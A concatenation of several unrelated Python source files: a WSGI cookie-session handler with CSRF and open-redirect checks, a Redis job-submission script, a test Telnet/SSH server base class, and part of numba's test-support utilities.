class CookieSession(UnicodeMixin):
"""A session object
Used to persist a small amount of information in the user's browser
making the session stateful. The purpose of the session cookie is
to hold information that does not need to be kept secret from the
user's browser but which can be verified through cookie signing
(outside the scope of this class).
Bear in mind that, when serialised and signed the session data must
fit comfortably into a cookie. Space in cookies is severely
restricted so we only store information in the session that can't be
looked up quickly in an external data store. Although this class
can be extended to add additional information in most cases you
won't need to do this and can instead use the session id as a key
for loading any additional information.
The session can be initialised from an optional character string
which, if provided, is parsed for the session information.
Otherwise the session object is generated with a new randomly
selected ID.
Session lifecycle
When a session is first created it is in an unestablished state. In
this state the session ID is not fixed and the session data may be
exposed in a URL. Once established, the session ID will be fixed
and it must not be exposed in a URL. Strict limits are placed on
the allowable age of an unestablished session and, as an additional
security measure, they are tied to a fixed User-Agent string.
The :class:`SessionApp` class and the associated decorator take care
of most of the complexity and they allow you to create pages that
will only be returned to the user once a session has been
established. At that point you can read/write protected information
indexed using the session id.
If you need to store protected information before the session is
established (only necessary when users might initiate your
application using an authenticated POST request from a third party
system) then you will need to:
1 Create the protected information record and index it using
the unestablished session id.
2 When the session is established you'll need to update the
session id used to index any protected information thereby
isolating the unestablished session id. This can be done by
overriding :meth:`SessionApp.establish_session`
Merging Sessions
In some unusual cases a new session may need to be merged into an
existing one (e.g., when cookies are blocked in frames but not when
the user opens a new window from the frame). In cases like this you
may want to override :meth:`SessionApp.merge_session` to reconcile
the two sessions prior to the newer session being discarded."""
def __init__(self, src=None):
if src:
fields = src.split('-')
if len(fields) >= 3:
self.sid = fields[0]
self.established = (fields[1] == '1')
self.last_seen = iso.TimePoint.from_str(fields[2])
else:
raise ValueError("Bad CookieSession: %s" % src)
else:
self.sid = generate_key()
self.established = False
self.last_seen = iso.TimePoint.from_now_utc()
def __unicode__(self):
return "%s-%s-%s" % (self.sid, '1' if self.established else '0',
self.last_seen.get_calendar_string(basic=True))
def establish(self):
if self.established:
raise ValueError("Session already established: %s" % self.sid)
self.sid = generate_key()
self.established = True
return self.sid
def seen_now(self):
self.last_seen = iso.TimePoint.from_now_utc()
def age(self):
return iso.TimePoint.from_now_utc().get_unixtime() - \
self.last_seen.get_unixtime()
def session_decorator(page_method):
"""Decorates a web method with session handling
page_method
An unbound method with signature: page_method(obj, context)
which performs the WSGI protocol and returns the page
generator.
Our decorator just calls :meth:`SessionContext.session_wrapper`."""
def method_call(self, context):
# There's a smarter way to do this but this is easier to read
# and understand I think...
return self.session_wrapper(context, lambda x: page_method(self, x))
# for more info see:
# http://stackoverflow.com/questions/1015307/python-bind-an-unbound-method
return method_call
class SessionContext(WSGIContext):
"""Extends the base class with a session object."""
def __init__(self, environ, start_response, canonical_root=None):
WSGIContext.__init__(self, environ, start_response, canonical_root)
#: a session object, or None if no session available
self.session = None
self.session_cookie = None
def start_response(self):
"""Saves the session cookie."""
if self.session_cookie:
# update the browser cookie
self.add_header('Set-Cookie', str(self.session_cookie))
return super(SessionContext, self).start_response()
class SessionApp(WSGIDataApp):
"""Extends WSGIDataApp to include session handling.
These sessions require support for cookies. The SessionApp class
itself uses two cookies purely for session tracking.
The key 'SessionApp' is reserved for settings defined by this
class in the settings file. The defined settings are:
timeout (600)
The number of seconds after which an inactive session will time
out and no longer be accessible to the client.
cookie ('sid')
The name of the session cookie.
cookie_test ('ctest')
The name of the test cookie. This cookie is set with a longer
lifetime and acts both as a test of whether cookies are
supported or not and can double up as an indicator of whether
user consent has been obtained for any extended use of cookies.
It defaults to the value '0', indicating that cookies can be
stored but that no special consent has been obtained.
cookie_test_age (8640000)
The age of the test cookie (in seconds). The default value is
equivalent to 100 days. If you use the test cookie to record
consent to some cookie policy you should ensure that when you
set the value you use a reasonable lifespan.
csrftoken ('csrftoken')
The name of the form field containing the CSRF token"""
_session_timeout = None
_session_cookie = None
_test_cookie = None
@classmethod
def setup(cls, options=None, args=None, **kwargs):
"""Adds database initialisation"""
super(SessionApp, cls).setup(options, args, **kwargs)
settings = cls.settings.setdefault('SessionApp', {})
cls._session_timeout = settings.setdefault('timeout', 600)
cls._session_cookie = force_bytes(
settings.setdefault('cookie', 'sid'))
cls._test_cookie = force_bytes(
settings.setdefault('cookie_test', 'ctest'))
cls.csrf_token = settings.setdefault('crsf_token', 'csrftoken')
settings.setdefault('cookie_test_age', 8640000)
@classmethod
def load_default_metadata(cls):
mdir = OSFilePath(__file__).abspath().split()[0]
metadata_file = mdir.join('wsgi_metadata.xml').abspath()
metadata = edmx.Document()
with metadata_file.open('rb') as f:
metadata.read(f)
return metadata
#: The name of our CSRF token
csrf_token = None
#: Extended context class
ContextClass = SessionContext
#: The session class to use, must be (derived from) :class:`Session`
SessionClass = CookieSession
def init_dispatcher(self):
"""Adds pre-defined pages for this application
These pages are mapped to /ctest and /wlaunch. These names are
not currently configurable. See :meth:`ctest` and
:meth:`wlaunch` for more information."""
WSGIApp.init_dispatcher(self)
self.set_method('/ctest', self.ctest)
self.set_method('/wlaunch', self.wlaunch)
def session_wrapper(self, context, page_method):
"""Called by the session_decorator
Uses :meth:`set_session` to ensure the context has a session
object. If this request is a POST then the form is parsed and
the CSRF token checked for validity."""
if context.session is None:
cookies = context.get_cookies()
csrf_match = ""
s_signed = cookies.get(self._session_cookie, b'').decode('ascii')
self.set_session(context)
if context.environ['REQUEST_METHOD'].upper() == 'POST':
# check the CSRF token
if s_signed:
try:
s_msg = self.app_cipher.check_signature(s_signed)
csrf_match = self.SessionClass(
s_msg.decode('utf-8')).sid
except ValueError:
# we'll warn about this in a moment anyway
pass
token = context.get_form_string(self.csrf_token)
# we accept a token even if the session expired but this
# form is unlikely to do much with a new session. The
# point is we compare to the cookie received and not the
# actual session key as this may have changed
if not token or token != csrf_match:
logger.warning(
"%s\nSecurity threat intercepted; "
"POST token mismatch, possible CSRF attack\n"
"cookie=%s; token=%s",
context.environ.get('PATH_INFO', ''),
csrf_match, token)
return self.error_page(context, 403)
return self.session_page(context, page_method, context.get_url())
def set_session(self, context):
"""Sets the session object in the context
The session is read from the session cookie, established and
marked as being seen now. If no cookie is found a new session
is created. In both cases a cookie header is set to update the
cookie in the browser."""
context.session = None
cookies = context.get_cookies()
s_signed = cookies.get(self._session_cookie, b'').decode('ascii')
if s_signed and self._test_cookie in cookies:
try:
s_msg = self.app_cipher.check_signature(s_signed)
context.session = self.SessionClass(s_msg.decode('utf-8'))
if context.session.established:
if context.session.age() > self._session_timeout:
context.session = None
elif context.session.age() > 120:
# You have 2 minutes to establish a session
context.session = None
if context.session:
# successfully read a session from the cookie this
# session can now be established
if not context.session.established:
self.establish_session(context)
context.session.seen_now()
self.set_session_cookie(context)
except ValueError:
# start a new session
logger.warning(
"%s\nSecurity threat intercepted; "
"session tampering detected\n"
"cookie=%s",
context.environ.get('PATH_INFO', ''),
s_signed)
pass
if context.session is None:
context.session = self.SessionClass()
self.set_session_cookie(context)
def set_session_cookie(self, context):
"""Adds the session cookie to the response headers
The cookie is bound to the path returned by
:meth:`WSGIContext.get_app_root` and is marked as being
http_only and is marked secure if we have been accessed through
an https URL.
You won't normally have to call this method but you may want to
override it if your application wishes to override the cookie
settings."""
root = context.get_app_root()
msg = to_text(context.session).encode('utf-8')
context.session_cookie = cookie.Section4Cookie(
self._session_cookie,
self.app_cipher.ascii_sign(msg).encode('ascii'),
path=str(root.abs_path), http_only=True,
secure=root.scheme.lower() == 'https')
def clear_session_cookie(self, context):
"""Removes the session cookie"""
root = context.get_app_root()
context.session_cookie = cookie.Section4Cookie(
self._session_cookie,
b'', path=str(root.abs_path), http_only=True,
secure=root.scheme.lower() == 'https', max_age=0)
def set_test_cookie(self, context, value="0"):
"""Adds the test cookie"""
c = cookie.Section4Cookie(
self._test_cookie, value,
path=str(context.get_app_root().abs_path),
max_age=self.settings['SessionApp']['cookie_test_age'])
context.add_header('Set-Cookie', str(c))
def establish_session(self, context):
"""Mark the session as established
This will update the session ID, override this method to update
any data store accordingly if you are already associating
protected information with the session to prevent it becoming
orphaned."""
context.session.establish()
def merge_session(self, context, merge_session):
"""Merges a session into the session in the context
Override this method to update any data store. If you are
already associating protected information with merge_session you
need to transfer it to the context session.
The default implementation does nothing and merge_session is
simply discarded."""
pass
def session_page(self, context, page_method, return_path):
"""Returns a session protected page
context
The :class:`WSGIContext` object
page_method
A function or *bound* method that will handle the page.
Must have the signature::
page_method(context)
and return the generator for the page as per the WSGI
specification.
return_path
A :class:`pyslet.rfc2396.URI` instance pointing at the page
that will be returned by page_method, used if the session is
not established yet and a redirect to the test page needs to
be implemented.
This method is only called *after* the session has been created,
in other words, context.session must be a valid session.
This method either calls the page_method (after ensuring that
the session is established) or initiates a redirection sequence
which culminates in a request to return_path."""
# has the user been here before?
cookies = context.get_cookies()
if self._test_cookie not in cookies:
# no they haven't, set a cookie and redirect
c = cookie.Section4Cookie(
self._test_cookie, "0",
path=str(context.get_app_root().abs_path),
max_age=self.settings['SessionApp']['cookie_test_age'])
context.add_header('Set-Cookie', str(c))
# add in the User-Agent and return path to the signature
# when in the query to help prevent an open redirect
# (strength in depth - first line of defence)
return_path_str = str(return_path)
s = to_text(context.session)
msg = s + return_path_str + context.environ.get(
'HTTP_USER_AGENT', '')
sig = self.app_cipher.sign(msg.encode('utf-8'))
query = urlencode(
{'return': return_path_str, 's': s, 'sig': sig})
ctest = URI.from_octets('ctest?' + query).resolve(
context.get_app_root())
return self.redirect_page(context, ctest)
return page_method(context)
def ctest(self, context):
"""The cookie test handler
This page takes three query parameters:
return
The return URL the user originally requested
s
The session that should be received in a cookie
sig
The session signature which includes the the User-Agent at
the end of the message.
framed (optional)
An optional parameter, if present and equal to '1' it means
we've already attempted to load the page in a new window so
if we still can't read cookies we'll return the
:meth:`cfail_page`.
If cookies cannot be read back from the context this page will
call the :meth:`ctest_page` to provide an opportunity to open
the application in a new window (or :meth:`cfail_page` if this
possibility has already been exhausted.
If cookies are successfully read, they are compared with the
expected values (from the query) and the user is returned to the
return URL with an automatic redirect. The return URL must be
within the same application (to prevent 'open redirect' issues)
and, to be extra safe, we change the user-visible session ID as
we've exposed the previous value in the URL which makes it more
liable to snooping."""
cookies = context.get_cookies()
logger.debug("cookies: %s", repr(cookies))
query = context.get_query()
logger.debug("query: %s", repr(query))
if 'return' not in query or 's' not in query or 'sig' not in query:
# missing required parameters
return self.error_page(context, 400)
qmsg = query['s']
qsig = query['sig']
return_path = query['return']
if self._test_cookie not in cookies:
# cookies are blocked
if query.get('framed', '0') == '1':
# we've been through the wlaunch sequence already
# just fail
return self.cfail_page(context)
wlaunch = URI.from_octets('wlaunch').resolve(
context.get_app_root())
return self.ctest_page(
context, str(wlaunch), return_path, qmsg, qsig)
ua = context.environ.get('HTTP_USER_AGENT', '')
try:
self.app_cipher.check_signature(
qsig, (qmsg + return_path + ua).encode('utf-8'))
qsession = self.SessionClass(qmsg)
if qsession.established:
raise ValueError
except ValueError:
logger.warning("%s\nSecurity threat intercepted in ctest; "
"query tampering detected\n"
"s=%s; sig=%s;\nUserAgent: %s",
context.environ.get('PATH_INFO', ''),
qmsg, qsig, ua)
self.clear_session_cookie(context)
return self.error_page(context, 400)
cmsg_signed = cookies.get(
self._session_cookie, b'MISSING').decode('ascii')
try:
cmsg = self.app_cipher.check_signature(cmsg_signed)
csession = self.SessionClass(cmsg.decode('utf-8'))
if csession.established:
raise ValueError
except ValueError:
logger.warning("%s\nSecurity threat intercepted in ctest; "
"cookie tampering detected\n"
"cookie=%s\nUserAgent: %s",
context.environ.get('PATH_INFO', ''),
cmsg, ua)
self.clear_session_cookie(context)
return self.error_page(context, 400)
if csession.sid != qsession.sid or csession.established:
# we got a cookie, but not the one we expected. Possible
# foul play so kill the session. Established sessions must
# never make it to this page as they've been exposed in the
# URL.
logger.warning("%s\nSecurity threat intercepted in ctest; "
"session mismatch, possible fixation attack\n"
"cookie=%s; query=%s",
context.environ.get('PATH_INFO', ''),
cmsg, qmsg)
self.clear_session_cookie(context)
return self.error_page(context, 400)
if not self.check_redirect(context, return_path):
self.clear_session_cookie(context)
return self.error_page(context, 400)
# we have matching session ids and the redirect checks out, we
# now load the session from the cookie for real. This repeats
# the validity check but also adds the session timeout checks.
# This will result in an established session or, if the test
# page sequence was too slow, a new session that will be
# established when the return_path calls set_session.
self.set_session(context)
return self.redirect_page(context, return_path)
def ctest_page(self, context, target_url, return_url, s, sig):
"""Returns the cookie test page
Called when cookies are blocked (perhaps in a frame).
context
The request context
target_url
A string containing the base link to the wlaunch page. This
page can opened in a new window (which may get around the
cookie restrictions). You must pass the return_url and the
sid values as the 'return' and 'sid' query parameters
respectively.
return_url
A string containing the URL the user originally requested,
and the location they should be returned to when the session
is established.
s
The session
sig
The session signature
You may want to override this implementation to provide a more
sophisticated page. The default simply presents the target_url
with added "return", "s" and "sig" parameters as a simple
hypertext link that will open in a new window.
A more sophisticated application might render a button or a form
but bear in mind that browsers that cause this page to load are
likely to prevent automated ways of opening this link."""
query = urlencode({'return': return_url, 's': s, 'sig': sig})
target_url = str(target_url) + '?' + query
data = """<html>
<head><title>Cookie Test Page</title></head>
<body>
<p>Cookie test failed: try opening in a <a href=%s
target="_blank" id="wlaunch">new window</a></p></body>
</html>""" % xml.escape_char_data7(str(target_url), True)
context.set_status(200)
return self.html_response(context, data)
def wlaunch(self, context):
"""Handles redirection to a new window
The query parameters must contain:
return
The return URL the user originally requested
s
The session that should also be received in a cookie
sig
The signature of the session, return URL and User-Agent
This page initiates the redirect sequence again, but this time
setting the framed query parameter to prevent infinite
redirection loops."""
cookies = context.get_cookies()
logger.debug("cookies: %s", repr(cookies))
query = context.get_query()
if 'return' not in query or 's' not in query or 'sig' not in query:
# missing required parameters
return self.error_page(context, 400)
logger.debug("query: %s", repr(query))
qmsg = query['s']
qsig = query['sig']
return_path = query['return']
ua = context.environ.get('HTTP_USER_AGENT', '')
# load the session from the query initially
try:
self.app_cipher.check_signature(
qsig, (qmsg + return_path + ua).encode('utf-8'))
qsession = self.SessionClass(qmsg)
if qsession.established:
raise ValueError
except ValueError:
logger.warning("%s\nSecurity threat intercepted in wlaunch; "
"query tampering detected\n"
"s=%s; sig=%s;\nUserAgent: %s",
context.environ.get('PATH_INFO', ''),
qmsg, qsig, ua)
self.clear_session_cookie(context)
return self.error_page(context, 400)
if not self.check_redirect(context, return_path):
return self.error_page(context, 400)
if self._test_cookie not in cookies:
# no cookies, either the user has never been here before or
# cookies are blocked completely, reuse the unestablished
# session from the query and go back to the test page
context.session = qsession
self.set_session_cookie(context)
self.set_test_cookie(context)
query = urlencode(
{'return': return_path, 's': qmsg, 'sig': qsig,
'framed': '1'})
ctest = URI.from_octets('ctest?' + query).resolve(
context.get_app_root())
return self.redirect_page(context, ctest)
# so cookies were blocked in the frame but now we're in a new
# window, suddenly, they appear. Merge our new session into the
# old one if the old one was already established
self.set_session(context)
# merge qsession into the one found in the older cookie (no need
# to establish it)
self.merge_session(context, qsession)
return self.redirect_page(context, return_path)
def cfail_page(self, context):
"""Called when cookies are blocked completely.
The default simply returns a plain text message stating that
cookies are blocked. You may want to include a page here with
information about how to enable cookies, a link to the privacy
policy for your application to help people make an informed
decision to turn on cookies, etc."""
context.set_status(200)
data = b"Page load failed: blocked cookies"
context.add_header("Content-Type", "text/plain")
context.add_header("Content-Length", str(len(data)))
context.start_response()
return [data]
def check_redirect(self, context, target_path):
"""Checks a target path for an open redirect
target_path
A string or :class:`~pyslet.rfc2396.URI` instance.
Returns True if the redirect is *safe*.
The test ensures that the canonical root of our application
matches the canonical root of the target. In other words, it
must have the same scheme and matching authority (host/port)."""
if target_path:
if not isinstance(target_path, URI):
target_path = URI.from_octets(target_path)
if (target_path.get_canonical_root() !=
context.get_app_root().get_canonical_root()):
# catch the open redirect here, nice try!
logger.warning("%s\nSecurity threat intercepted; "
"external redirect, possible phishing attack\n"
"requested redirect to %s",
str(context.get_url()), str(target_path))
return False
else:
return True
else:
return False
|
submit.py
|
from redis import Redis
from choreo.multirq import Queue
import time
import threading
import random
def main():
queue = Queue(connection=Redis())
result = queue.enqueue('tasks.sleepy', args=(random.randint(20, 20),), timeout=10)
tic = time.time()
while result.get_status() not in ('finished', 'failed'):
time.sleep(1)
toc = time.time()
duration = round(toc - tic, 2)
print(f'Waiting for result, for {duration}')
print(f'Got result: {result.return_value}')
for _ in range(1):
time.sleep(1)
threading.Thread(target=main).start()
|
server.py
|
#
# Copyright (C) 2010-2017 Samuel Abels
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Base class for all servers.
"""
from __future__ import print_function
from builtins import str
import select
import socket
from multiprocessing import Process, Pipe
class Server(Process):
"""
Base class of the Telnet and SSH servers. Servers are intended to be
used for tests and attempt to emulate a device using the behavior of
the associated :class:`Exscript.emulators.VirtualDevice`. Sample usage::
device = VirtualDevice('myhost')
daemon = Telnetd('localhost', 1234, device)
device.add_command('ls', 'ok', prompt = True)
device.add_command('exit', daemon.exit_command)
daemon.start() # Start the server.
daemon.exit() # Stop the server.
daemon.join() # Wait until it terminates.
"""
def __init__(self, host, port, device, encoding='utf8'):
"""
Constructor.
:type host: str
:param host: The address against which the daemon binds.
:type port: str
:param port: The TCP port on which to listen.
:type device: VirtualDevice
:param device: A virtual device instance.
:type encoding: str
:param encoding: The encoding of data between client and server.
"""
Process.__init__(self, target=self._run)
self.host = host
self.port = int(port)
self.timeout = .5
self.dbg = 0
self.running = False
self.buf = b''
self.socket = None
self.device = device
self.encoding = encoding
self.to_child, self.to_parent = Pipe()
self.processes = []
def _dbg(self, level, msg):
if self.dbg >= level:
print(self.host + ':' + str(self.port), '-', end=' ')
print(msg)
def _poll_child_process(self):
if not self.to_parent.poll():
return False
try:
msg = self.to_parent.recv()
except socket.error:
self.running = False
return False
if msg == 'shutdown':
self.running = False
return False
if not self.running:
return False
return True
def _handle_connection(self, conn):
raise NotImplementedError()
def _run(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind((self.host, self.port))
self.socket.listen(1)
self.running = True
while self.running:
self._poll_child_process()
r, w, x = select.select([self.socket], [], [], self.timeout)
if not r:
continue
conn, addr = self.socket.accept()
proc = Process(target=self._handle_connection, args=(conn,))
self.processes.append(proc)
proc.start()
for proc in self.processes:
proc.join()
self.processes = []
self.socket.close()
def exit(self):
"""
Stop the daemon without waiting for the thread to terminate.
"""
self.to_child.send('shutdown')
def exit_command(self, cmd):
"""
Like exit(), but may be used as a handler in add_command.
:type cmd: str
:param cmd: The command that causes the server to exit.
"""
self.exit()
return ''
|
support.py
|
"""
Assorted utilities for use in tests.
"""
from __future__ import print_function
import cmath
import contextlib
import enum
import errno
import gc
import math
import os
import shutil
import subprocess
import sys
import tempfile
import time
import io
import ctypes
import multiprocessing as mp
from contextlib import contextmanager
import numpy as np
from numba import config, errors, typing, utils, numpy_support, testing
from numba.compiler import compile_extra, compile_isolated, Flags, DEFAULT_FLAGS
from numba.targets import cpu
import numba.unittest_support as unittest
from numba.runtime import rtsys
from numba.six import PY2
enable_pyobj_flags = Flags()
enable_pyobj_flags.set("enable_pyobject")
force_pyobj_flags = Flags()
force_pyobj_flags.set("force_pyobject")
no_pyobj_flags = Flags()
nrt_flags = Flags()
nrt_flags.set("nrt")
tag = testing.make_tag_decorator(['important', 'long_running'])
_windows_py27 = (sys.platform.startswith('win32') and
sys.version_info[:2] == (2, 7))
_32bit = sys.maxsize <= 2 ** 32
_reason = 'parfors not supported'
skip_parfors_unsupported = unittest.skipIf(_32bit or _windows_py27, _reason)
skip_py38_or_later = unittest.skipIf(
utils.PYVERSION >= (3, 8),
"unsupported on py3.8 or later"
)
class CompilationCache(object):
"""
A cache of compilation results for various signatures and flags.
This can make tests significantly faster (or less slow).
"""
def __init__(self):
self.typingctx = typing.Context()
self.targetctx = cpu.CPUContext(self.typingctx)
self.cr_cache = {}
def compile(self, func, args, return_type=None, flags=DEFAULT_FLAGS):
"""
Compile the function or retrieve an already compiled result
from the cache.
"""
from numba.targets.registry import cpu_target
cache_key = (func, args, return_type, flags)
try:
cr = self.cr_cache[cache_key]
except KeyError:
# Register the contexts in case for nested @jit or @overload calls
# (same as compile_isolated())
with cpu_target.nested_context(self.typingctx, self.targetctx):
cr = compile_extra(self.typingctx, self.targetctx, func,
args, return_type, flags, locals={})
self.cr_cache[cache_key] = cr
return cr
class TestCase(unittest.TestCase):
longMessage = True
# A random state yielding the same random numbers for any test case.
# Use as `self.random.<method name>`
@utils.cached_property
def random(self):
return np.random.RandomState(42)
def reset_module_warnings(self, module):
"""
Reset the warnings registry of a module. This can be necessary
as the warnings module is buggy in that regard.
See http://bugs.python.org/issue4180
"""
if isinstance(module, str):
module = sys.modules[module]
try:
del module.__warningregistry__
except AttributeError:
pass
@contextlib.contextmanager
def assertTypingError(self):
"""
A context manager that asserts the enclosed code block fails
compiling in nopython mode.
"""
_accepted_errors = (errors.LoweringError, errors.TypingError,
TypeError, NotImplementedError)
with self.assertRaises(_accepted_errors) as cm:
yield cm
@contextlib.contextmanager
def assertRefCount(self, *objects):
"""
A context manager that asserts the given objects have the
same reference counts before and after executing the
enclosed block.
"""
old_refcounts = [sys.getrefcount(x) for x in objects]
yield
new_refcounts = [sys.getrefcount(x) for x in objects]
for old, new, obj in zip(old_refcounts, new_refcounts, objects):
if old != new:
self.fail("Refcount changed from %d to %d for object: %r"
% (old, new, obj))
@contextlib.contextmanager
def assertNoNRTLeak(self):
"""
A context manager that asserts no NRT leak was created during
the execution of the enclosed block.
"""
old = rtsys.get_allocation_stats()
yield
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free,
"number of data allocs != number of data frees")
self.assertEqual(total_mi_alloc, total_mi_free,
"number of meminfo allocs != number of meminfo frees")
_bool_types = (bool, np.bool_)
_exact_typesets = [_bool_types, utils.INT_TYPES, (str,), (np.integer,),
(utils.text_type), (bytes, np.bytes_)]
_approx_typesets = [(float,), (complex,), (np.inexact)]
_sequence_typesets = [(tuple, list)]
_float_types = (float, np.floating)
_complex_types = (complex, np.complexfloating)
def _detect_family(self, numeric_object):
"""
This function returns a string description of the type family
that the object in question belongs to. Possible return values
are: "exact", "complex", "approximate", "sequence", and "unknown"
"""
if isinstance(numeric_object, np.ndarray):
return "ndarray"
if isinstance(numeric_object, enum.Enum):
return "enum"
for tp in self._sequence_typesets:
if isinstance(numeric_object, tp):
return "sequence"
for tp in self._exact_typesets:
if isinstance(numeric_object, tp):
return "exact"
for tp in self._complex_types:
if isinstance(numeric_object, tp):
return "complex"
for tp in self._approx_typesets:
if isinstance(numeric_object, tp):
return "approximate"
return "unknown"
def _fix_dtype(self, dtype):
"""
Fix the given *dtype* for comparison.
"""
# Under 64-bit Windows, Numpy may return either int32 or int64
# arrays depending on the function.
if (sys.platform == 'win32' and sys.maxsize > 2**32 and
dtype == np.dtype('int32')):
return np.dtype('int64')
else:
return dtype
def _fix_strides(self, arr):
"""
Return the strides of the given array, fixed for comparison.
Strides for 0- or 1-sized dimensions are ignored.
"""
if arr.size == 0:
return [0] * arr.ndim
else:
return [stride / arr.itemsize
for (stride, shape) in zip(arr.strides, arr.shape)
if shape > 1]
def assertStridesEqual(self, first, second):
"""
Test that two arrays have the same shape and strides.
"""
self.assertEqual(first.shape, second.shape, "shapes differ")
self.assertEqual(first.itemsize, second.itemsize, "itemsizes differ")
self.assertEqual(self._fix_strides(first), self._fix_strides(second),
"strides differ")
def assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None
):
"""
Versatile equality testing function with more built-in checks than
standard assertEqual().
For arrays, test that layout, dtype, shape are identical, and
recursively call assertPreciseEqual() on the contents.
For other sequences, recursively call assertPreciseEqual() on
the contents.
For scalars, test that two scalars or have similar types and are
equal up to a computed precision.
If the scalars are instances of exact types or if *prec* is
'exact', they are compared exactly.
If the scalars are instances of inexact types (float, complex)
and *prec* is not 'exact', then the number of significant bits
is computed according to the value of *prec*: 53 bits if *prec*
is 'double', 24 bits if *prec* is single. This number of bits
can be lowered by raising the *ulps* value.
ignore_sign_on_zero can be set to True if zeros are to be considered
equal regardless of their sign bit.
abs_tol if this is set to a float value its value is used in the
following. If, however, this is set to the string "eps" then machine
precision of the type(first) is used in the following instead. This
kwarg is used to check if the absolute difference in value between first
and second is less than the value set, if so the numbers being compared
are considered equal. (This is to handle small numbers typically of
magnitude less than machine precision).
Any value of *prec* other than 'exact', 'single' or 'double'
will raise an error.
"""
try:
self._assertPreciseEqual(first, second, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
except AssertionError as exc:
failure_msg = str(exc)
# Fall off of the 'except' scope to avoid Python 3 exception
# chaining.
else:
return
# Decorate the failure message with more information
self.fail("when comparing %s and %s: %s" % (first, second, failure_msg))
def _assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None):
"""Recursive workhorse for assertPreciseEqual()."""
def _assertNumberEqual(first, second, delta=None):
if (delta is None or first == second == 0.0
or math.isinf(first) or math.isinf(second)):
self.assertEqual(first, second, msg=msg)
# For signed zeros
if not ignore_sign_on_zero:
try:
if math.copysign(1, first) != math.copysign(1, second):
self.fail(
self._formatMessage(msg,
"%s != %s" %
(first, second)))
except TypeError:
pass
else:
self.assertAlmostEqual(first, second, delta=delta, msg=msg)
first_family = self._detect_family(first)
second_family = self._detect_family(second)
assertion_message = "Type Family mismatch. (%s != %s)" % (first_family,
second_family)
if msg:
assertion_message += ': %s' % (msg,)
self.assertEqual(first_family, second_family, msg=assertion_message)
# We now know they are in the same comparison family
compare_family = first_family
# For recognized sequences, recurse
if compare_family == "ndarray":
dtype = self._fix_dtype(first.dtype)
self.assertEqual(dtype, self._fix_dtype(second.dtype))
self.assertEqual(first.ndim, second.ndim,
"different number of dimensions")
self.assertEqual(first.shape, second.shape,
"different shapes")
self.assertEqual(first.flags.writeable, second.flags.writeable,
"different mutability")
# itemsize is already checked by the dtype test above
self.assertEqual(self._fix_strides(first),
self._fix_strides(second), "different strides")
if first.dtype != dtype:
first = first.astype(dtype)
if second.dtype != dtype:
second = second.astype(dtype)
for a, b in zip(first.flat, second.flat):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "sequence":
self.assertEqual(len(first), len(second), msg=msg)
for a, b in zip(first, second):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "exact":
exact_comparison = True
elif compare_family in ["complex", "approximate"]:
exact_comparison = False
elif compare_family == "enum":
self.assertIs(first.__class__, second.__class__)
self._assertPreciseEqual(first.value, second.value,
prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "unknown":
# Assume these are non-numeric types: we will fall back
# on regular unittest comparison.
self.assertIs(first.__class__, second.__class__)
exact_comparison = True
else:
assert 0, "unexpected family"
# If a Numpy scalar, check the dtype is exactly the same too
# (required for datetime64 and timedelta64).
if hasattr(first, 'dtype') and hasattr(second, 'dtype'):
self.assertEqual(first.dtype, second.dtype)
# Mixing bools and non-bools should always fail
if (isinstance(first, self._bool_types) !=
isinstance(second, self._bool_types)):
assertion_message = ("Mismatching return types (%s vs. %s)"
% (first.__class__, second.__class__))
if msg:
assertion_message += ': %s' % (msg,)
self.fail(assertion_message)
try:
if cmath.isnan(first) and cmath.isnan(second):
# The NaNs will compare unequal, skip regular comparison
return
except TypeError:
# Not floats.
pass
# if absolute comparison is set, use it
if abs_tol is not None:
if abs_tol == "eps":
rtol = np.finfo(type(first)).eps
elif isinstance(abs_tol, float):
rtol = abs_tol
else:
raise ValueError("abs_tol is not \"eps\" or a float, found %s"
% abs_tol)
if abs(first - second) < rtol:
return
exact_comparison = exact_comparison or prec == 'exact'
if not exact_comparison and prec != 'exact':
if prec == 'single':
bits = 24
elif prec == 'double':
bits = 53
else:
raise ValueError("unsupported precision %r" % (prec,))
k = 2 ** (ulps - bits - 1)
delta = k * (abs(first) + abs(second))
else:
delta = None
if isinstance(first, self._complex_types):
_assertNumberEqual(first.real, second.real, delta)
_assertNumberEqual(first.imag, second.imag, delta)
elif isinstance(first, (np.timedelta64, np.datetime64)):
# Since Np 1.16 NaT == NaT is False, so special comparison needed
if numpy_support.version >= (1, 16) and np.isnat(first):
self.assertEqual(np.isnat(first), np.isnat(second))
else:
_assertNumberEqual(first, second, delta)
else:
_assertNumberEqual(first, second, delta)
def run_nullary_func(self, pyfunc, flags):
"""
Compile the 0-argument *pyfunc* with the given *flags*, and check
it returns the same result as the pure Python function.
The got and expected results are returned.
"""
